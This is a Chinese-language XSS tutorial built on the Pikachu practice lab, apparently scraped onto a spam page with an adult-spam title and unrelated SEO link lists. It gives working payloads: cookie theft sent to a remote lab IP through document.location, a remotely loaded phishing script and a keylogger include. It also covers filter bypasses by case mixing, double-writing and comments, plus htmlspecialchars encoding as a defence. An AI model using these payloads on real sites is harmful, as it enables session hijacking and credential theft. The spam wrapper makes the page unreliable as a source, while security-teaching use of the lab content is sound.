中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當前位置: 首頁 > news >正文

攝影師簽約有哪些網站線上宣傳渠道

攝影師簽約有哪些網站,線上宣傳渠道,通道一通道二通道三免費,網站更新提示ui怎末做XSS全稱(Cross Site Scripting)跨站腳本攻擊,XSS屬于客戶端攻擊,受害者最終是用戶,在網頁中嵌入客戶端惡意腳本代碼,最常用javascript語言。(注意:疊成樣式表CSS已經被占用所以叫XSS&#xff09…

XSS全稱(Cross Site Scripting)跨站腳本攻擊,XSS屬于客戶端攻擊,受害者最終是用戶,在網頁中嵌入客戶端惡意腳本代碼,最常用javascript語言。(注意:疊成樣式表CSS已經被占用所以叫XSS)

原因:輸入沒過濾,輸出沒編碼。

危害:劫持用戶cookie,釣魚,掛馬

分類:

1、反射性XSS(中危,一次性不保存在數(shù)據庫,交互的地方,比如帶參和輸入更新),

2、儲存型XSS(高危,長久保存在數(shù)據庫)

3、DOM XSS(低危,無數(shù)據庫交互,瀏覽器的dom節(jié)點),可能存在html文本框,URL文本框,樣式等

操作:

在萬能閉合‘“>后面插入語句<script>prompt(1)</script>

或者用彈窗語句‘“><script>alert(1)</script>,彈出一個對話框1,如果能彈窗說明這里是有漏洞的。

示例,name變量沒有進行過濾

cookie收集展示

?設置下點擊頁面的時候返回地址,這樣減少用戶的疑問,也可以把返回的網址換成登錄的網頁

111'"><script>document.location = 'http://網站IP和端口/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

配置好返回的界面后,輸入以下代碼,提交然后剛才提交的那個電腦的cookie就保存在到pkxss里面了。且用戶點擊的界面在提交代碼之后返回到之前配置的那個index.php上。

盲打獲取賬戶密碼

在不確定是否有注入點的地方輸入后,登錄后臺可以把登錄的賬戶和密碼拿到,在md5解密就可以獲得賬戶密碼

111'"><script>document.location = 'http://192.168.246.11/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

post方式

釣魚

'"><script src="http://192.168.246.11/pikachu/pkxss/xfish/fish.php"></script>

注意:再次點擊的時候沒有彈出,是因為已經保存這個電腦信息,需要瀏覽器清除下cookie

收集鍵盤信息

同源策略:瀏覽器都約定了“同源策略,禁止頁面加載或執(zhí)行與自身來源不同的域的任何腳本既不同域之間不能使用JS進行操作。比如:x.com域名下的js不能操作y.com域名下的對象

http:// www. ? oldboyedu.com ?:80 / ? news/index.php
協(xié)議 ? ?子域名 ? ?主域名 ? ? ? ? ? ? ? 端口 ? ?資源地址

必須要全部一樣才算同源

后臺設置好Access-Control-Allow-Origin,設置為*,既允許所有人訪問。

111'"><script src="http://192.168.246.11/pikachu/pkxss/rkeypress/rk.js"></script>,鍵盤記錄rk.js執(zhí)行,然后在頁面任何位置輸入就可以鍵盤輸入記錄

XSS繞過

前段繞過,大小寫,雙寫,注釋,編碼

1、對前端的限制可以嘗試進行抓包重發(fā)或者修改前端的HTML。比如修改輸入框字符。
2、防止后臺對輸入的內容進行正則匹配來過濾輸入,對于這樣的過濾可以考慮大小寫混合輸入的方法。比如:<sCRipT>alert('你吃飯像tuzi')</sCrIPt>,利用的是精準過濾,換成大小寫就繞過了。也可以用其他標簽比如框架iframe,類型style,標簽svg


3、防止后臺對輸入的內容進行替換,采用拼拼湊的輸入方法。比如:<sc<script>ript>alert(你吃飯像tuzi')</scr<script>ipt>
4、使用注釋來干擾后臺對輸入內容的識別。比如:<sc<!--test-->ript>alert('你吃飯像tuzi')</scr<!--tshauie-->ipt>
5:、編碼,保證輸出的情況下后臺代碼過濾

htmlspecialchars()函數(shù)把一些預定義的字符轉換為 HTML 實體。

可用的quotestyle類型:

ENT_COMPAT - 默認。僅編碼雙引號

ENT_QUOTES - 編碼雙引號和單引號

ENT_NOQUOTES - 不編碼任何引

預定義的字符是:
?& (和號)成為 &amp
?" (雙引號)成為 &quot
?’ (單引號)成為&#039
?< (小于)成為 &lt
?>(大于)成為 &gt

該函數(shù)的語法:htmlspecialchars(string,flags,character-set,double_encode)

href輸出:javascript:alert(1111)?

http://www.risenshineclean.com/news/5785.html

相關文章:

  • 成都娛樂場所關閉最新消息武漢建站優(yōu)化廠家
  • 中糧網站是哪個公司做的上海高端seo公司
  • 長春二道網站建設百度明星搜索量排行榜
  • 響應式網站wordpress攝影家居seo整站優(yōu)化方案
  • 網站開發(fā)量計算百度一下你就知道移動官網
  • 如何做商業(yè)推廣網站提高關鍵詞排名的軟文案例
  • 網站站點文件夾權限設置青島網站關鍵詞優(yōu)化公司
  • 中國做網站推廣哪家好武漢外包seo公司
  • 浦東新區(qū)消息今天淘寶seo什么意思
  • 網站怎么做三級的游戲優(yōu)化大師
  • 建行網站登錄不了荊門網絡推廣
  • 深圳網站制作必選祥奔科技域名訪問網站怎么進入
  • 長沙理財網站建設魔方優(yōu)化大師官網
  • 網站做推廣頁需要什么軟件注冊公司
  • 在putty上怎樣安裝wordpress刷關鍵詞優(yōu)化排名
  • 如何給網站做301重定向搜索引擎有哪幾個網站
  • 一個公司做兩個網站的好處seo上海培訓
  • 自助建站系統(tǒng)源碼下載大慶網絡推廣
  • 錦州做網站廣州做網站的公司哪家好
  • 獨立網站優(yōu)化廣告寧波seo網絡推廣渠道介紹
  • 統(tǒng)一社會信用代碼查詢廈門網站seo哪家好
  • 做網站怎么兼職網絡公司網絡營銷推廣方案
  • 青浦區(qū)網站建設費用企業(yè)營銷策略
  • 網站建設技術交流免費發(fā)外鏈
  • 做外鏈的網站如何推廣app
  • 百度的網站關鍵詞被篡改友情鏈接交易平臺
  • wap網站的開發(fā)域名ip查詢查網址
  • 網站空間選擇企查查在線查詢
  • 做外貿網站推廣什么比較好以下屬于網站seo的內容是
  • 營銷型網站的建設要求都有什么影響東莞寮步最新通知